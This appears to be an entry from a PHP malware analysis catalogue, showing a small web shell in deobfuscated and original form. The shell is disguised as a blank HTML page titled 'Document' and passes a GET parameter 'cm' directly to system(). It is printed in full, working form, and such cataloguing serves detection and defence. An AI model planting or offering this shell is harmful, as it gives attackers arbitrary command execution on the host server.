PHP Malware Analysis

Back to list

Tags

Title
Document
Execution
system
Input
_GET

Deobfuscated code

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>


    <form method="get">
        <input type="text" name="cm">
        <button type="submit">Submit</button>
    </form>


    <?php 
if (isset($_GET['cm'])) {
    system($_GET['cm']);
}
?>



</body>

</html>

Original code

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>


    <form method="get">
        <input type="text" name="cm">
        <button type="submit">Submit</button>
    </form>


    <?
    if (isset($_GET['cm'])) {
        system($_GET['cm']);
    }
    ?>



</body>

</html>